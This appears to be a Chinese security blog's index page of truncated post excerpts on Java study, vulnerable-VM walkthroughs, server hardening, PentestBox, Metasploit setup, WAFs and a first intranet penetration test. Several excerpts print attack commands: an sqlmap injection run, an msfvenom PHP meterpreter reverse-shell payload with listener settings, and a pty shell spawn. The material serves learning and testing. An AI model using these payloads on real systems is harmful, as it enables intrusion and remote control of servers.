java对象与类(更新中。。。)
0x00 前言本周学习java核心技术卷1基础知识原版第10版第四章-对象与类这两周浪费了好多时间,都没怎么学,虽然学习压力大,但是还是要好好学习。
0x01 面向对象程序设计概述个人理解,java中的类和其他语言中的函数类似,只允许用户调用函数或者类下的方法,不允许直接修改函数或者类,提高了安全性。
0x02 使用预定义类对象与对象变量对象变量如果赋值null,那么此对象变量的指针指向了null。
import java.util.Date;public class date { public static void main(String[] args){ //实例化(构造)一个新类,使用Date下的方法,必须实例化(构造) System.out.println(new Date());//Wed Aug 07 23:27:00 CST 2019 String s = new Date().toString(); System.out.println(s);//Wed Aug 07 23:32:09 CST 2 ...
Freshly靶机实战
0x00 环境搭建靶机环境:ubuntu攻击机:kali、windows虚拟机:VirtualBOX网络环境:桥接
0x01 信息收集nmap扫描192.168.1.0/24
探测靶机IP192.168.1.35开放端口80、443、8080
80端口只有一个图片,查看源代码没有任何信息443和8080都跳转到wordpress网站
上扫描器和wpscanwordpress版本4.1目录扫描出很多文件和目录
网站开放评论,应该是下载的插件
错误信息暴露绝对路径
http://192.168.1.35:8080/wordpress/wp-content/themes/twentythirteen/
使用dirbuster扫描192.168.1.35,发现login.php和phpmyadmin
(PS:由于网络不一样,所以桥接的IP也变了,环境都是一样的)phpmyadmin没有账号密码无法登录.login.php,发现登录页面,且随意输入账户密码后页面有回显,可能存在注入
抓包后使用POST盲注测试
sqlmap -r 1.txt --random-agent --level ...
Ubuntu下Nginx+php+mysql+安全加固
环境搭建0x00 准备工作虚拟机:Vmware15系统:Ubuntu16虚拟机装ubuntu过程个人觉得就不用详说了。。反正就是一顿操作猛如虎。。然后就安装好了,因为登录是个人用户,所以做了一些设置,让其可以使用root方式登录。
1、安装vim(个人喜欢用vim,自带的vi不太喜欢用) sudo apt-get install vim2、设置root密码 sudo passwd ******3、配置文件,设置root可登录 sudo vim /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf 在文件最后添加:greeter-show-manual-login=true
更换源
sudo vim /etc/apt/sources.list清华大学源deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial main restricted universe multiverse# deb-src https://mirrors.tuna.tsinghua.edu.cn ...
PentestBox入门手册
PentestBo是一款在windows下的便携式开源渗透测试环境,可将linux下工具移植到windows下使用.官网:https://pentestbox.org/
文件基本结构
使用命令:toolsmanager
根据编号选择进入工具集,这里我选择10,web类
如果需要按照工具,使用install whatweb即可
关于输入toolsmanager,提示不是内部或外部命令,也不是可运行程序和处理文件问题解决
右击窗口选项-> debug -> properties勾选此选项
后续会慢慢更新!!!!
参考连接:https://www.sqlsec.com/2016/11/pentestbox.html#!https://www.freebuf.com/sectool/125881.htmlhttps://blog.csdn.net/c465869935/article/details/79600365https://www.fujieace.com/pentestbox/msfconsole-3.html
Lazysysadmin靶机实战
0x00 环境搭建靶机:ubuntu14攻击机:kali、windows10网络:NAT
0x01 信息收集靶机和kali设置同一IP段,故直接nmap 192.168.190.0/24靶机IP 192.168.190.132开放端口:22、80、139、445、3306、6667
开放80和3306,存在web环境,先看下网页查看源代码,发现有一串base64
data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAoCAYAAAC8cqlMAAAB5UlEQVR42u2ZPWvCUBSGM+UfFO3e3dLu/QN+oKj4EUXRQREEJYgoiCAu6qCogyDo7iJ21UUaKqEgCC4iiEMGB3UVgsnpTWj/wfVK2nvhGbKEPJyT996TMMzPGg6H5mKx+GgkyuWyeTQasb8OTDwef4tEIp8+n+/LYIjJZJJHQiwzm81M6OLDarWqNpsNjEYgEJCy2ewT0+/3TagighElNFAnQT6ft1ARKkJFqMgfFvF4PFpuEwFt ...
MSF后门生成
0x00 Metasploit连接数据库启动数据库service postgresql start
查看是否启动成功
service postgresql status
进入postgresql配置
sudo -u postgrs psql配置数据库密码(root)alter user postgres password 'admin'退出数据库\q
修改数据库配置
进入以下目录cd /etc/postgresql/10/main打开配置文件vim(leafpad) postgresql.conf修改listen_addresses = '*'password_encryption = md5保存退出
在pg_hba.conf文件最后添加一条数据
host all all 0.0.0.0/24 md5
重启数据库服务
service postgresql restart
连接数据库
psql -U postgres -h 127.0.0.1
创建数据库输入以下命令连接数据库
create user msf with password 'adm ...
初探内网渗透
0x00 前言公司的测试站,拿到了一个shell,然后准备内网一波,技术菜,第一次尝试内网渗透
0x01 反弹shell公司大佬仍了一个shell,使用冰蝎连接后发现命令行不好用,命令无法成功执行,因为是linux的,所以准备提权用脏牛提权一波,但是执行gcc命令,没有返回。。没办法只能上msf了,开整.
首先是用msf生成了一个php的反弹木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >text.php
下面就是用msf接收反弹的shell了
set payload windows/meterpreter/reverse_tcpset lhost 192.168.1.1set lport 4444set ExirOnSession flaseexploit
把生成的php木马上传到客户网站,然后运行一波反弹成功
使用一条python命令返回一个回显窗口
python -c 'import pty;pty.spawn("/bin/bash")'
看了下权限,很低,所以尝 ...
关于WAF那些事
0x01什么是waf概念简述首先WAF(Web Application Firewall),俗称Web应用防火墙,主要的目的实际上是用来过滤不正常或者恶意请求包,以及为服务器打上临时补丁的作用。
1、云waf:
在配置云waf时(通常是CDN包含的waf),DNS需要解析到CDN的ip上去,在请求uri时,数据包就会先经过云waf进行检测,如果通过再将数据包流给主机。常见产品:阿里云防护,腾讯云防护,创宇云之类等。
2、主机防护软件:
在主机上预先安装了这种防护软件,和监听web端口的流量是否有恶意的,所以这种从功能上讲较为全面。这里再插一嘴,mod_security、ngx-lua-waf这类开源waf虽然看起来不错,但是有个弱点就是升级的成本会高一些。常见产品:云锁,安全狗之类产品。
3、硬件WAF:
硬件WAF可以理解为流量代理,一般部署方式都需要流量经过它,针对数据包进行拆包->清洗->规则命中->放行/丢弃,当然现在更有甚者,给WAF上了一个头脑,采用深度学习,语义分析等操作,来减少本身WAF因为单调的规则导致可能被绕过的问题。常见产品:各产品铁盒 ...
Acid靶机实战
0x00 环境靶场环境:Vmware虚拟机 ubuntu系统攻击环境: kali、windows网络环境: NAT模式IP: 192.168.190.130
0x01 信息收集nmap 扫描开放端口,开放一个端口33447,运行web服务老规矩上扫描器。。。Apache:2.4.10查看源代码发现一个/images/bg.jpg,图片目录,似乎没有什么信息对首页F12发现一串十六进制0x643239334c6d70775a773d3d十六进制还原后d293LmpwZw==,base64解密后wow.jpg。。。没啥信息。。dirb跑出一个/images/Thume.db,用c32看了一波,发现有这些数字,不知道是啥,先记录一下。456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
哈哈哈,柳暗花明又一村啊,习惯性点翻译中文,发现图片上面还有有字,检查一波看了一下,发现有一串base64的编码
R0lG ...
JAVA基础程序设计(第三章)
0x00 前言目前在学习JAVA核心技术卷1基础知识原版第10版+极客时间的JAVA课程。由于极客时间讲的有点点跟不上,所以过来啃书,本篇是第三章,写的代码及知识点都会写在本篇博客作为记录。
0x01 JAVA程序书写格式java程序固定格式
public class test { public static void main(String[] args){ 代码块 }}
固定的格式如上,main是定义一个程序的入口,public class test,这里test是文件名,文件名必须是test不然会报错,是对应的,大小写也必须一致
0x02 print和println的区别下面是测试代码。。。不太懂英文,写不出很骚气的英文名称
public class ceshi { public static void main(String[] args){ System.out.print("hello");//输出无换行 //System.out.println("hello");//输出有换行 }}
其实感觉是没啥差别的,就是print没有 ...